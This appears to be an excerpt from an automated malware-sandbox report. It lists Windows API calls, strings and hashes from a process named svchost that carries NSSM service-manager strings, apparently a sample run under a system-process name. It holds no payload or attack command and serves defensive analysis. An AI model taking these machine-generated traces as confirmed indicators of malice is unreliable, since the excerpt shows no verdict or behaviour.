                                                    • Associated: 00000005.00000002.1347768887.000000000041D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000005.00000002.1347786260.0000000000422000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000005.00000002.1347801041.0000000000426000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_400000_svchost.jbxd
                                                    Similarity
                                                    • API ID: ErrorOpenPolicyStatus
                                                    • String ID: lsa_canon$username_sid
                                                    • API String ID: 3835286460-3440772048
                                                    • Opcode ID: 4be24f8c859b4fd8f73fde33ddbbb5feb2b1e283fdf2ddda045c7394c8cdc431
                                                    • Instruction ID: c21e6304ed427eea8d7a4b8d0c36af05136f334d03c0e194f28452d20308fd16
                                                    • Opcode Fuzzy Hash: 4be24f8c859b4fd8f73fde33ddbbb5feb2b1e283fdf2ddda045c7394c8cdc431
                                                    • Instruction Fuzzy Hash: C641E3B59042017BD300FB69CC96DAB73E9FFC4708F44881EF58897252E678D99487A6
                                                    APIs
                                                    • GetProcessHeap.KERNEL32(00000000,?,00000000,771AE010,?), ref: 0040EA3B
                                                    • HeapAlloc.KERNEL32(00000000), ref: 0040EA42
                                                    • __snwprintf_s.LIBCMT ref: 0040EA5C
                                                    • __snwprintf_s.LIBCMT ref: 0040EA83
                                                    • SetServiceStatus.ADVAPI32(?,?), ref: 0040EADA
                                                    • __snwprintf_s.LIBCMT ref: 0040EAF3
                                                    • __snwprintf_s.LIBCMT ref: 0040EB07
                                                    • WaitForSingleObject.KERNEL32(?,?), ref: 0040EB40
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.1347748964.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000005.00000002.1347735341.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000005.00000002.1347768887.000000000041D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000005.00000002.1347786260.0000000000422000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000005.00000002.1347801041.0000000000426000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_400000_svchost.jbxd
                                                    Similarity
                                                    • API ID: __snwprintf_s$Heap$AllocObjectProcessServiceSingleStatusWait
                                                    • String ID: %lu$%s()
                                                    • API String ID: 3479796768-699940799
                                                    • Opcode ID: e71cb8d17e41331fe53131b87f854323c29ecb78752b37c52de2a023a38e2165
                                                    • Instruction ID: 89c68062588a5b6a5dcd3b42c23b9f1343587bb4bcf2e221744147efb473305d
                                                    • Opcode Fuzzy Hash: e71cb8d17e41331fe53131b87f854323c29ecb78752b37c52de2a023a38e2165
                                                    • Instruction Fuzzy Hash: 6B41B7B1A04300EBD620DF65DD85F9B73A8FB84714F104A2EB669932C0E778E954CB69
                                                    APIs
                                                    • __snwprintf_s.LIBCMT ref: 0040A88E
                                                      • Part of subcall function 00412731: __vsnwprintf_s_l.LIBCMT ref: 00412748
                                                    • RegCreateKeyExW.ADVAPI32(80000002,?,00000000,00000000,00000000,00020006,00000000,00000000,00000000,00409EC9), ref: 0040A8EB
                                                    • GetLastError.KERNEL32(00000000), ref: 0040A8F7
                                                      • Part of subcall function 00405400: RegisterEventSourceW.ADVAPI32(00000000,nssm), ref: 0040540B
                                                      • Part of subcall function 00405400: ReportEventW.ADVAPI32(00000000,?,00000000), ref: 00405459
                                                      • Part of subcall function 00405400: DeregisterEventSource.ADVAPI32(00000000), ref: 00405460
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.1347748964.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000005.00000002.1347735341.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000005.00000002.1347768887.000000000041D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000005.00000002.1347786260.0000000000422000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000005.00000002.1347801041.0000000000426000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_400000_svchost.jbxd
                                                    Similarity
                                                    • API ID: Event$Source$CreateDeregisterErrorLastRegisterReport__snwprintf_s__vsnwprintf_s_l
                                                    • String ID: EventMessageFile$NSSM$SYSTEM\CurrentControlSet\Services\EventLog\Application\%s$TypesSupported$create_messages()$eventlog registry
                                                    • API String ID: 508490100-129066941
                                                    • Opcode ID: 38dc869d80ae876ed19f88e43e9c7c4997b2ce9d1b33560f508c1b5226a0dd81
                                                    • Instruction ID: 189017753002612d24ec776b8254467aa4e8da1510a31d32c64f91d8f6ef9f68
                                                    • Opcode Fuzzy Hash: 38dc869d80ae876ed19f88e43e9c7c4997b2ce9d1b33560f508c1b5226a0dd81
                                                    • Instruction Fuzzy Hash: 0A31CAF1A443006BE210E754CC47FEB7394EB88B08F50452EB659971C2F6F8A5848796
                                                    APIs
                                                      • Part of subcall function 00405370: GetUserDefaultLangID.KERNEL32(00401059,0000FFFF,00000000,?,?,?,0040547B,40000206,?,00401059,-00000040,40000206,00000000,00000000), ref: 0040537F
                                                      • Part of subcall function 00405370: FormatMessageW.KERNELBASE(00000B00,00000000,0040547B,?,?,?,?,0040547B,40000206,?,00401059,-00000040,40000206,00000000,00000000), ref: 0040539B
                                                      • Part of subcall function 00405370: FormatMessageW.KERNEL32(00000B00,00000000,0040547B,00000000,00401059,0000FFFF,00000000,?,?,?,?,0040547B,40000206,?,00401059,-00000040), ref: 004053B4
                                                      • Part of subcall function 00405370: GetProcessHeap.KERNEL32(00000000,00000040,?,?,?,?,0040547B,40000206,?,00401059,-00000040,40000206,00000000,00000000), ref: 004053BD
                                                      • Part of subcall function 00405370: HeapAlloc.KERNEL32(00000000,?,?,?,?,0040547B,40000206,?,00401059,-00000040,40000206,00000000,00000000), ref: 004053C4
                                                      • Part of subcall function 00405370: __snwprintf_s.LIBCMT ref: 004053DC
                                                    • MessageBoxW.USER32(00000000,The message which was supposed to go here is missing!,NSSM,00000030), ref: 004054E4
                                                    • __strftime_l.LIBCMT ref: 00405516
                                                    • LocalFree.KERNEL32(00000000), ref: 00405523
                                                    • MessageBoxW.USER32(00000000,The message which was supposed to go here is too big!,NSSM,00000030), ref: 00405537
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.1347748964.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000005.00000002.1347735341.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000005.00000002.1347768887.000000000041D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000005.00000002.1347786260.0000000000422000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000005.00000002.1347801041.0000000000426000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_400000_svchost.jbxd
                                                    Similarity
                                                    • API ID: Message$FormatHeap$AllocDefaultFreeLangLocalProcessUser__snwprintf_s__strftime_l
                                                    • String ID: ($NSSM$The message which was supposed to go here is missing!$The message which was supposed to go here is too big!$e
                                                    • API String ID: 3053442334-353540380
                                                    • Opcode ID: eef27968d068f8b1e99ffeeeb08f58d77e7ebdd7b0cc62038cf6a803b3575ee0
                                                    • Instruction ID: 9a0a8de4c5d0dfbf6e97c11b6962cbdff5b354b3c8bec1d6dae1fd1358dc6512
                                                    • Opcode Fuzzy Hash: eef27968d068f8b1e99ffeeeb08f58d77e7ebdd7b0cc62038cf6a803b3575ee0
                                                    • Instruction Fuzzy Hash: EB315EB1905301AFD350DF29D845B9FBBE4EF88354F40493EF959D2241E7788648CB9A
                                                    APIs
                                                    • RegQueryValueExW.ADVAPI32(?,?,00000000,?,00000000,?,00000000,?,?,?,0040C1D6,?,00000000,AppEnvironment,?,?), ref: 0040AB95
                                                    • GetLastError.KERNEL32(00000000,?,0040C1D6,?,00000000,AppEnvironment,?,?), ref: 0040ABBD
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.1347748964.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000005.00000002.1347735341.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000005.00000002.1347768887.000000000041D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000005.00000002.1347786260.0000000000422000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000005.00000002.1347801041.0000000000426000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_400000_svchost.jbxd
                                                    Similarity
                                                    • API ID: ErrorLastQueryValue
                                                    • String ID: get_environment()
                                                    • API String ID: 1349404517-3013924771
                                                    • Opcode ID: 5fe43cc991a531061349832457c459933e1ba32819d714f4fa0c8be67a97d6b9
                                                    • Instruction ID: 1d8989cfc65caa848716c5f45015e9ce7db8ed1eb8c61d39c0da8540bf3f80e9
                                                    • Opcode Fuzzy Hash: 5fe43cc991a531061349832457c459933e1ba32819d714f4fa0c8be67a97d6b9
                                                    • Instruction Fuzzy Hash: 2541A1F26043006BE3109B55EC45FA777ACEB8471AF20457EF645E72C1D6B9D440CA66
                                                    APIs
                                                    • QueryServiceConfig2W.ADVAPI32(00000002,00000003,00000000,00000000,00000000,00000000,00000000,00000000,00000002,0040DDED,00000002,?,00000000,00008400), ref: 0040D6D3
                                                    • GetLastError.KERNEL32 ref: 0040D6DB
                                                    • GetProcessHeap.KERNEL32(00000000,?), ref: 0040D6ED
                                                    • HeapAlloc.KERNEL32(00000000), ref: 0040D6F4
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.1347748964.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000005.00000002.1347735341.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000005.00000002.1347768887.000000000041D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000005.00000002.1347786260.0000000000422000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000005.00000002.1347801041.0000000000426000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_400000_svchost.jbxd
                                                    Similarity
                                                    • API ID: Heap$AllocConfig2ErrorLastProcessQueryService
                                                    • String ID: SERVICE_CONFIG_DELAYED_AUTO_START_INFO$SERVICE_DELAYED_AUTO_START_INFO$get_service_startup()
                                                    • API String ID: 2527037045-1869567720
                                                    • Opcode ID: bf1bcd56317e02efd2dd7698e4ba2d83c3c3b2c1e479c8237d6ba54ce11f5d08
                                                    • Instruction ID: 097b29a2a90f646509759188dcc962e1ab6821ba756d97a4ddf6cf1ac72e26d1
                                                    • Opcode Fuzzy Hash: bf1bcd56317e02efd2dd7698e4ba2d83c3c3b2c1e479c8237d6ba54ce11f5d08
                                                    • Instruction Fuzzy Hash: B531D4F6A403016BE310DFA9DC89FAB7798EB84315F54487AF504E7281E778E8448A69
                                                    APIs
                                                    • CreatePipe.KERNEL32(?,?,00000000,00000000), ref: 0040915B
                                                    • SetHandleInformation.KERNEL32(00000000,00000001,00000001,?,?,00000000,00000000), ref: 0040916C
                                                    • GetProcessHeap.KERNEL32(00000008,00000030), ref: 00409176
                                                    • HeapAlloc.KERNEL32(00000000), ref: 0040917D
                                                    • GetLastError.KERNEL32(?,?,00000000,00000000), ref: 004091A9
                                                    • CreateThread.KERNEL32(00000000,00000000,Function_00008D50,00000000,00000000,?), ref: 00409222
                                                    • GetLastError.KERNEL32(00000000), ref: 0040922F
                                                    • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00409250
                                                    • HeapFree.KERNEL32(00000000), ref: 00409257
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.1347748964.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000005.00000002.1347735341.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000005.00000002.1347768887.000000000041D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000005.00000002.1347786260.0000000000422000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000005.00000002.1347801041.0000000000426000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_400000_svchost.jbxd
                                                    Similarity
                                                    • API ID: Heap$CreateErrorLastProcess$AllocFreeHandleInformationPipeThread
                                                    • String ID: create_logging_thread()$logger
                                                    • API String ID: 3682172063-2332508298
                                                    • Opcode ID: 5364c44dd14288a0f0078d0c2a26264fb7274c226d6cf196836e5ebcf69bdcaf
                                                    • Instruction ID: 7a5f417da971cce8bdb4d489e7d561c2bea4d1d3adffcb45d960dbf457daacd4
                                                    • Opcode Fuzzy Hash: 5364c44dd14288a0f0078d0c2a26264fb7274c226d6cf196836e5ebcf69bdcaf
                                                    • Instruction Fuzzy Hash: 5731A0B1A00701AFD3209F65DC49F9BB7E8EF88714F10892EF649E7291D674E8408B59
                                                    APIs
                                                    • __snwprintf_s.LIBCMT ref: 0040E8A3
                                                    • __snwprintf_s.LIBCMT ref: 0040E8ED
                                                    • EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0040E921
                                                    • SetWaitableTimer.KERNEL32(?,?,00000000,00000000,00000000,00000000,?,00000000,FFFFD8F0,000000FF), ref: 0040E95C
                                                    • SetServiceStatus.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040E97A
                                                    • SleepConditionVariableCS.KERNELBASE(?,?,?), ref: 0040E998
                                                    • LeaveCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0040E99F
                                                    • WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040E9C4
                                                    • Sleep.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0040E9DD
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.1347748964.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000005.00000002.1347735341.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000005.00000002.1347768887.000000000041D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000005.00000002.1347786260.0000000000422000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000005.00000002.1347801041.0000000000426000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_400000_svchost.jbxd
                                                    Similarity
                                                    • API ID: CriticalSectionSleep__snwprintf_s$ConditionEnterLeaveObjectServiceSingleStatusTimerVariableWaitWaitable
                                                    • String ID: %lu
                                                    • API String ID: 418212672-685833217
                                                    • Opcode ID: d4d9859d66ea56a1125a05eea6eb692c0986071de63174207467bd870c1a4a4e
                                                    • Instruction ID: 0bcbe74f60e49559a2a01a7623a54cf792aad81448e6a6f2708ebc24a96566d6
                                                    • Opcode Fuzzy Hash: d4d9859d66ea56a1125a05eea6eb692c0986071de63174207467bd870c1a4a4e
                                                    • Instruction Fuzzy Hash: 5141DCF1A04700EBD7249B25CC46BDB73D4BB88314F508B2EF25EA61C0E67CA945C759
                                                    APIs
                                                    • GetProcessHeap.KERNEL32(00000000,?), ref: 00410E22
                                                    • HeapFree.KERNEL32(00000000), ref: 00410E29
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.1347748964.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000005.00000002.1347735341.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000005.00000002.1347768887.000000000041D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000005.00000002.1347786260.0000000000422000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000005.00000002.1347801041.0000000000426000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_400000_svchost.jbxd
                                                    Similarity
                                                    • API ID: Heap$FreeProcess
                                                    • String ID: AppEnvironment
                                                    • API String ID: 3859560861-948859433
                                                    • Opcode ID: 04cadfac52257cf83fd6566f2c35dc0dcf809a10a3b222f8c10f06632aaf1ac7
                                                    • Instruction ID: d0ab22901641b4708907b5ad450eb196165ffe8a0ecf88f64d9a13dda8279097
                                                    • Opcode Fuzzy Hash: 04cadfac52257cf83fd6566f2c35dc0dcf809a10a3b222f8c10f06632aaf1ac7
                                                    • Instruction Fuzzy Hash: 724106B2A042016BE2009B69EC09FEB37A8DFC4725F14492EF515D62D1DBB8D8C5C76A
                                                    APIs
                                                    • QueryServiceConfigW.ADVAPI32(00000000,00000000,00000000,0040DD63,00000003,00000000,00000002,?,0040DD63,00000002,00000000), ref: 0040CD48
                                                    • GetLastError.KERNEL32(?,0040DD63,00000002,00000000), ref: 0040CD50
                                                    • GetProcessHeap.KERNEL32(00000008,0040DD63,00000000,?,0040DD63,00000002,00000000), ref: 0040CD63
                                                    • HeapAlloc.KERNEL32(00000000,?,0040DD63,00000002,00000000), ref: 0040CD6A
                                                    • QueryServiceConfigW.ADVAPI32(00000000,00000000,?,?,?,0040DD63,00000002,00000000), ref: 0040CD94
                                                    • GetProcessHeap.KERNEL32(00000000,00000000,?,0040DD63,00000002,00000000), ref: 0040CD9C
                                                    • HeapFree.KERNEL32(00000000,?,0040DD63,00000002,00000000), ref: 0040CDA3
                                                    • GetLastError.KERNEL32(00000000,?,0040DD63,00000002,00000000), ref: 0040CDAB
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.1347748964.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000005.00000002.1347735341.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000005.00000002.1347768887.000000000041D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000005.00000002.1347786260.0000000000422000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000005.00000002.1347801041.0000000000426000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_400000_svchost.jbxd
                                                    Similarity
                                                    • API ID: Heap$ConfigErrorLastProcessQueryService$AllocFree
                                                    • String ID: QUERY_SERVICE_CONFIG$query_service_config()
                                                    • API String ID: 2921672788-976127789
                                                    • Opcode ID: f0828055e39d8f9797993dd67b379e2a0b7a4cee187890433159a102a33d25e2
                                                    • Instruction ID: ec6184287c6e1aa3659987899a8ea3cdc59ea47e861b503f6ba41a7943c46725
                                                    • Opcode Fuzzy Hash: f0828055e39d8f9797993dd67b379e2a0b7a4cee187890433159a102a33d25e2
                                                    • Instruction Fuzzy Hash: 3F21D5F2A452017BE600A7A5EC8AFBF775CEFC5329F10893AF605D3181DA78D8049679
                                                    APIs
                                                    • ExpandEnvironmentStringsW.KERNEL32(?,00000000,00000000), ref: 00404FBB
                                                    • GetLastError.KERNEL32(00000000), ref: 00404FC8
                                                      • Part of subcall function 004052C0: TlsGetValue.KERNEL32(00000000,?,00401042,00000000,00000000), ref: 004052C7
                                                      • Part of subcall function 004052C0: LocalAlloc.KERNEL32(00000040,0000FFFF,?,00401042,00000000,00000000), ref: 004052DA
                                                      • Part of subcall function 00405400: RegisterEventSourceW.ADVAPI32(00000000,nssm), ref: 0040540B
                                                      • Part of subcall function 00405400: ReportEventW.ADVAPI32(00000000,?,00000000), ref: 00405459
                                                      • Part of subcall function 00405400: DeregisterEventSource.ADVAPI32(00000000), ref: 00405460
                                                    • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00404FFB
                                                    • HeapAlloc.KERNEL32(00000000), ref: 00404FFE
                                                    Strings
                                                    • ExpandEnvironmentStrings(), xrefs: 00405010
                                                    • expand_environment_string, xrefs: 0040500B
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.1347748964.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000005.00000002.1347735341.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000005.00000002.1347768887.000000000041D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000005.00000002.1347786260.0000000000422000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000005.00000002.1347801041.0000000000426000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_400000_svchost.jbxd
                                                    Similarity
                                                    • API ID: Event$AllocHeapSource$DeregisterEnvironmentErrorExpandLastLocalProcessRegisterReportStringsValue
                                                    • String ID: ExpandEnvironmentStrings()$expand_environment_string
                                                    • API String ID: 834161584-2090451141
                                                    • Opcode ID: f59b1bc273204f5623afe584567ecfba35516a339bb065064b188413960d3f6b
                                                    • Instruction ID: 1c240b0065301ebdc15cfa0ece81b4dfea20bbf87cc1a9778ddf823e08b6aba0
                                                    • Opcode Fuzzy Hash: f59b1bc273204f5623afe584567ecfba35516a339bb065064b188413960d3f6b
                                                    • Instruction Fuzzy Hash: AF11B2F2A416017BE21026B5BC4AFEB771CDB8076AF114472FA05E2182EA79C54045B9
                                                    APIs
                                                    • GetProcessHeap.KERNEL32(00000000,00000016), ref: 0040E620
                                                    • HeapAlloc.KERNEL32(00000000), ref: 0040E623
                                                    • __snwprintf_s.LIBCMT ref: 0040E658
                                                    • GetProcessHeap.KERNEL32(00000000,00000000), ref: 0040E682
                                                    • HeapFree.KERNEL32(00000000), ref: 0040E685
                                                      • Part of subcall function 00405400: RegisterEventSourceW.ADVAPI32(00000000,nssm), ref: 0040540B
                                                      • Part of subcall function 00405400: ReportEventW.ADVAPI32(00000000,?,00000000), ref: 00405459
                                                      • Part of subcall function 00405400: DeregisterEventSource.ADVAPI32(00000000), ref: 00405460
                                                    • GetProcessHeap.KERNEL32(00000000,00000000), ref: 0040E6C4
                                                    • HeapFree.KERNEL32(00000000), ref: 0040E6C7
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.1347748964.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000005.00000002.1347735341.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000005.00000002.1347768887.000000000041D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000005.00000002.1347786260.0000000000422000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000005.00000002.1347801041.0000000000426000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_400000_svchost.jbxd
                                                    Similarity
                                                    • API ID: Heap$EventProcess$FreeSource$AllocDeregisterRegisterReport__snwprintf_s
                                                    • String ID: 0x%08x$control code$log_service_control()
                                                    • API String ID: 844069407-2089045330
                                                    • Opcode ID: 9ef0c78e7c00f931eee4f5ffaa9126fd3d2030249d315e71256b6d1e8744bc2b
                                                    • Instruction ID: 612ea0ede9ba1e7cb3a868644965a314014b177a7dd95aa26f1d9d3cb81d428a
                                                    • Opcode Fuzzy Hash: 9ef0c78e7c00f931eee4f5ffaa9126fd3d2030249d315e71256b6d1e8744bc2b
                                                    • Instruction Fuzzy Hash: 6211CBF2B4031037E62062676C46FDF2648CB90BAAF550976FA09B61C2D5BD8C5141BD
                                                    APIs
                                                    • __snwprintf_s.LIBCMT ref: 00408511
                                                      • Part of subcall function 00412731: __vsnwprintf_s_l.LIBCMT ref: 00412748
                                                      • Part of subcall function 00405400: RegisterEventSourceW.ADVAPI32(00000000,nssm), ref: 0040540B
                                                      • Part of subcall function 00405400: ReportEventW.ADVAPI32(00000000,?,00000000), ref: 00405459
                                                      • Part of subcall function 00405400: DeregisterEventSource.ADVAPI32(00000000), ref: 00405460
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.1347748964.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000005.00000002.1347735341.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000005.00000002.1347768887.000000000041D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000005.00000002.1347786260.0000000000422000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000005.00000002.1347801041.0000000000426000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_400000_svchost.jbxd
                                                    Similarity
                                                    • API ID: Event$Source$DeregisterRegisterReport__snwprintf_s__vsnwprintf_s_l
                                                    • String ID: %s%s$CreationDisposition$FlagsAndAttributes$ShareMode$get_createfile_parameters()
                                                    • API String ID: 2445375048-825329064
                                                    • Opcode ID: b56b3a038a3fb234e7910174b92c3cda99c27529ad80f9ad3da27b13678a7099
                                                    • Instruction ID: d5bcaed63e337bfabc806c2c34b187c565ea729d6d27f924a01f1bb630a1831b
                                                    • Opcode Fuzzy Hash: b56b3a038a3fb234e7910174b92c3cda99c27529ad80f9ad3da27b13678a7099
                                                    • Instruction Fuzzy Hash: D0511AB27443001BD200A61A9D43FEFB3D4AB98779FD4052FF649E62C1FA7DD580869A
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.1347748964.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000005.00000002.1347735341.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000005.00000002.1347768887.000000000041D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000005.00000002.1347786260.0000000000422000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000005.00000002.1347801041.0000000000426000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_400000_svchost.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: %c%u
                                                    • API String ID: 0-883269693
                                                    • Opcode ID: a6a9a78c627fcc7f84f026c182eb2424cb4b7fe8dcf98c1fa97da1e8e50362f1
                                                    • Instruction ID: fcb05bf5aa25034c6b283f3d3c8d8d5dbfc9814c65828dd12b5a4fa76bd1d4d2
                                                    • Opcode Fuzzy Hash: a6a9a78c627fcc7f84f026c182eb2424cb4b7fe8dcf98c1fa97da1e8e50362f1
                                                    • Instruction Fuzzy Hash: 5A51BE729443058BD324DF68E8C57ABB3E5FB84310F544A3EE854D33A0E77A98458A9A
                                                    APIs
                                                    • TlsGetValue.KERNEL32(00000000,?,00401042,00000000,00000000), ref: 004052C7
                                                    • LocalAlloc.KERNEL32(00000040,0000FFFF,?,00401042,00000000,00000000), ref: 004052DA
                                                    • TlsSetValue.KERNEL32(00000000,00000000,?,00401042,00000000,00000000), ref: 004052F5
                                                    • GetUserDefaultLangID.KERNEL32(00000000,0000FFFF,00000000,?,?,?,00401042,00000000,00000000), ref: 00405305
                                                    • FormatMessageW.KERNEL32(00001200,00000000,?,?,?,?,?,00401042,00000000,00000000), ref: 00405321
                                                    • FormatMessageW.KERNEL32(00001200,00000000,?,00000000,00000000,0000FFFF,00000000,?,?,?,?,00401042,00000000,00000000), ref: 00405336
                                                    • __snwprintf_s.LIBCMT ref: 0040534A
                                                    Strings
                                                    • system error %lu, xrefs: 0040533D
                                                    • <out of memory for error message>, xrefs: 004052E6
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.1347748964.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000005.00000002.1347735341.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000005.00000002.1347768887.000000000041D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000005.00000002.1347786260.0000000000422000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000005.00000002.1347801041.0000000000426000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_400000_svchost.jbxd
                                                    Similarity
                                                    • API ID: FormatMessageValue$AllocDefaultLangLocalUser__snwprintf_s
                                                    • String ID: <out of memory for error message>$system error %lu
                                                    • API String ID: 1317610408-3923297632
                                                    • Opcode ID: b5758bec216b926b4d62f608ffe3328bbd5e3024216705962de944ccca3494a7
                                                    • Instruction ID: f23edb150031ebe2e0488c34495c660aa377f69acf961f8f06e15d9152bb88fb
